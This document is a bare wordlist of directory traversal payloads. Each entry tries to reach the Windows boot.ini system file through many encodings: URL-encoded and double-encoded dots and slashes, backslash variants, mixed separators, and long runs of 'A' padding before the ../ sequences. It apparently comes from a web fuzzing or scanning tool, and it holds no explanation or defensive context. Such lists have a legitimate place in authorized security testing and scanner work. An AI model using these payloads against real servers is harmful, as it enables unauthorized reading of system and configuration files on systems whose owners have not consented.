-/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/..%252fboot.ini -/..%252f..%252fboot.ini -/..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -/%252e%252e/boot.ini -/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/..\boot.ini -/..\..\boot.ini -/..\..\..\boot.ini -/..\..\..\..\boot.ini -/..\..\..\..\..\boot.ini -/..\..\..\..\..\..\boot.ini -/..\..\..\..\..\..\..\boot.ini -/..\..\..\..\..\..\..\..\boot.ini -/..%5cboot.ini -/..%5c..%5cboot.ini -/..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -/%2e%2e\boot.ini -/%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/..%255cboot.ini -/..%255c..%255cboot.ini -/..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -/%252e%252e\boot.ini -/%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/\../boot.ini -/\../\../boot.ini -/\../\../\../boot.ini -/\../\../\../\../boot.ini -/\../\../\../\../\../boot.ini -/\../\../\../\../\../\../boot.ini -/\../\../\../\../\../\../\../boot.ini -/\../\../\../\../\../\../\../\../boot.ini -//..\boot.ini -//..\/..\boot.ini -//..\/..\/..\boot.ini -//..\/..\/..\/..\boot.ini -//..\/..\/..\/..\/..\boot.ini -//..\/..\/..\/..\/..\/..\boot.ini -//..\/..\/..\/..\/..\/..\/..\boot.ini -//..\/..\/..\/..\/..\/..\/..\/..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\boot.ini 